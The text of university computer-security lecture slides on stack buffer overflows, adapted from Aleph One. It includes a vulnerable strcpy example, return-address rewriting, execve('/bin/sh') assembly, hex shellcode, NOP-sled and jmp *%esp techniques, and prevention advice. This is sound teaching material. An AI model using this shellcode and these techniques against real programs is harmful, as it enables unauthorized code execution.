Download - Lecture 9: Buffer Overflow *
![Page 1: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/1.jpg)
Lecture 9: Buffer Overflow*
CS 392/6813: Computer Security Fall 2010
Nitesh Saxena
*Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit) and Stanislav Nurilov
![Page 2: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/2.jpg)
04/19/23 Lecture 9 - Buffer Overflow 2
Course Admin Mid-terms graded
392 average: 48 6813: 70
HW4 solution to be posted HW4 to be graded HW5 will be posted very soon
![Page 3: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/3.jpg)
04/19/23 Lecture 9 - Buffer Overflow 3
Why study buffer overflow? Buffer overflow vulnerabilities are the most
commonly exploited- account for about half of all new security problems (CERT)
Are relatively easy to exploit
Many variations on stack smash- heap overflows, etc.
We’ll focus upon static buffer overflow vulnerabilities
![Page 4: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/4.jpg)
04/19/23 Lecture 9 - Buffer Overflow 4
Recall the Security Life Cycle
Threats
Policy
Specification
Design
Implementation
Operation and Maintenance
Which stage?
![Page 5: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/5.jpg)
04/19/23 Lecture 9 - Buffer Overflow 5
How Computer Works There is a processor that interfaces
with various devices Processor executes instructions
Add, sub, mult, jump and various functions
![Page 6: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/6.jpg)
04/19/23 Lecture 9 - Buffer Overflow 6
Where to get the instructions from Each process “thinks” that it has 4GB
(2^32) of (virtual) memory (assuming 32-bit processor)
Instructions are loaded into the memory Processor fetches and executes these
instructions one by one How does the processor know where to
return back after “jumping” and after returning from a function
![Page 7: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/7.jpg)
04/19/23 Lecture 9 - Buffer Overflow 7
Process Memory Organization
![Page 8: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/8.jpg)
04/19/23 Lecture 9 - Buffer Overflow 8
Process Memory Organization
![Page 9: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/9.jpg)
04/19/23 Lecture 9 - Buffer Overflow 9
Process Memory Organization
![Page 10: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/10.jpg)
04/19/23 Lecture 9 - Buffer Overflow 10
Function Calls
![Page 11: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/11.jpg)
04/19/23 Lecture 9 - Buffer Overflow 11
Function Calls
![Page 12: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/12.jpg)
04/19/23 Lecture 9 - Buffer Overflow 12
Buffer Overflow: Example
void function(char *str) { char buffer[8]; strcpy(buffer,str); }
void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; function(large_string); }
![Page 13: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/13.jpg)
04/19/23 Lecture 9 - Buffer Overflow 13
Buffer Overflows
![Page 14: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/14.jpg)
04/19/23 Lecture 9 - Buffer Overflow 14
Buffer Overflows
![Page 15: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/15.jpg)
04/19/23 Lecture 9 - Buffer Overflow 15
Buffer Overflows
![Page 16: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/16.jpg)
04/19/23 Lecture 9 - Buffer Overflow 16
Buffer Overflows
![Page 17: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/17.jpg)
04/19/23 Lecture 9 - Buffer Overflow 17
Buffer Overflows
![Page 18: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/18.jpg)
04/19/23 Lecture 9 - Buffer Overflow 18
Buffer Overflows
![Page 19: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/19.jpg)
04/19/23 Lecture 9 - Buffer Overflow 19
Buffer Overflows
![Page 20: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/20.jpg)
04/19/23 Lecture 9 - Buffer Overflow 20
Modifying the Execution Flow
void function() { char buffer1[4];
int *ret;
ret = buffer1 + 8;
(*ret) += 8; }
void main() { int x = 0;
function();
x = 1;
printf("%d\n",x); }
![Page 21: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/21.jpg)
04/19/23 Lecture 9 - Buffer Overflow 21
Modifying the Execution Flow
![Page 22: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/22.jpg)
04/19/23 Lecture 9 - Buffer Overflow 22
Modifying the Execution Flow
![Page 23: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/23.jpg)
04/19/23 Lecture 9 - Buffer Overflow 23
Modifying the Execution Flow
![Page 24: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/24.jpg)
04/19/23 Lecture 9 - Buffer Overflow 24
Modifying the Execution Flow
![Page 25: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/25.jpg)
04/19/23 Lecture 9 - Buffer Overflow 25
Exploiting Overflows- Smashing the Stack
So, we can modify the flow of execution- what do we want to do now?
Spawn a shell and issue commands from it
![Page 26: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/26.jpg)
04/19/23 Lecture 9 - Buffer Overflow 26
Exploiting Overflows- Smashing the Stack
• Now we can modify the flow of execution- what do we want to do now?
• Spawn a shell and issue commands from it
![Page 27: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/27.jpg)
04/19/23 Lecture 9 - Buffer Overflow 27
Exploiting Overflows- Smashing the Stack
What if there is no code to spawn a shell in the program we are exploiting?
Place the code in the buffer we are overflowing, and set the return address to point back to the buffer!
![Page 28: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/28.jpg)
04/19/23 Lecture 9 - Buffer Overflow 28
Exploiting Overflows- Smashing the Stack
• What if there is no code to spawn a shell in the program we are exploiting?
• Place the code in the buffer we are overflowing, and set the return address to point back to the buffer!
![Page 29: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/29.jpg)
04/19/23 Lecture 9 - Buffer Overflow 29
Spawning a Shell
#include <stdio.h>
#include <stdlib.h>
void main() { GDB
char *name[2]; ASSEMBLY CODE
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);
exit(0); }
![Page 30: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/30.jpg)
04/19/23 Lecture 9 - Buffer Overflow 30
Spawning a Shellvoid main() {__asm__(" jmp 0x2a
popl %esi
movl %esi,0x8(%esi)
movb $0x0,0x7(%esi)
movl $0x0,0xc(%esi)
movl $0xb,%eax GDB
movl %esi,%ebx BINARY CODE
leal 0x8(%esi),%ecx
leal 0xc(%esi),%edx
int $0x80
movl $0x1, %eax
movl $0x0, %ebx
int $0x80
call -0x2f
.string \"/bin/sh\" "); }
![Page 31: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/31.jpg)
04/19/23 Lecture 9 - Buffer Overflow 31
Spawning a Shell
char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
![Page 32: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/32.jpg)
04/19/23 Lecture 9 - Buffer Overflow 32
How to find Shellcode
1. Guess
- time consuming
- being wrong by 1 byte will lead to segmentation fault or invalid instruction
![Page 33: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/33.jpg)
04/19/23 Lecture 9 - Buffer Overflow 33
How to find Shellcode
2. Pad shellcode with NOP’s then guess
- we don’t need to be exactly on
- much more efficient
![Page 34: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/34.jpg)
04/19/23 Lecture 9 - Buffer Overflow 34
Can we do better? If we can find the address where
SP points to, we are home
![Page 35: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/35.jpg)
04/19/23 Lecture 9 - Buffer Overflow 35
Can we do better? Find out what shared libaries are being
used by the vulnerable program Use ldd command This also provides the starting address where
the shared libraries are stored in process’s memory
Find out where in the shared library the instruction jmp *%esp occurs
Add this to the starting address of the shared library
At %esp, store the instruction jmp –constant offset
![Page 36: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/36.jpg)
04/19/23 Lecture 9 - Buffer Overflow 36
Consider the simple program
![Page 37: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/37.jpg)
04/19/23 Lecture 9 - Buffer Overflow 37
Stack Contents – Normal Execution
![Page 38: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/38.jpg)
04/19/23 Lecture 9 - Buffer Overflow 38
Stack Contents – buffer overflow
![Page 39: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/39.jpg)
04/19/23 Lecture 9 - Buffer Overflow 39
How to prevent buffer overflows
Programmer level: Check the length of the input
Use functions strncpy (instead of strcpy)
OS level: Techniques such as address space
layout randomization
![Page 40: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/40.jpg)
04/19/23 Lecture 9 - Buffer Overflow 40
References Smashing the Stack for Fun and
Profit: http://doc.bughunter.net/buffer-overflow/smash-stack.html
Smashing the Modern Stack for Fun and Profit: http://netsec.cs.northwestern.edu/media/readings/modern_stack_smashing.pdf
![Page 41: Lecture 9: Buffer Overflow *](https://reader036.vdocuments.us/reader036/viewer/2022062304/56812f34550346895d94c685/html5/thumbnails/41.jpg)
04/19/23 Lecture 9 - Buffer Overflow 41
Announcement CS6903: Modern Cryptography,
Spring 2011, Wednesdays 5:30-8pm
http://cis.poly.edu/~nsaxena/docs/crypto-outline.pdf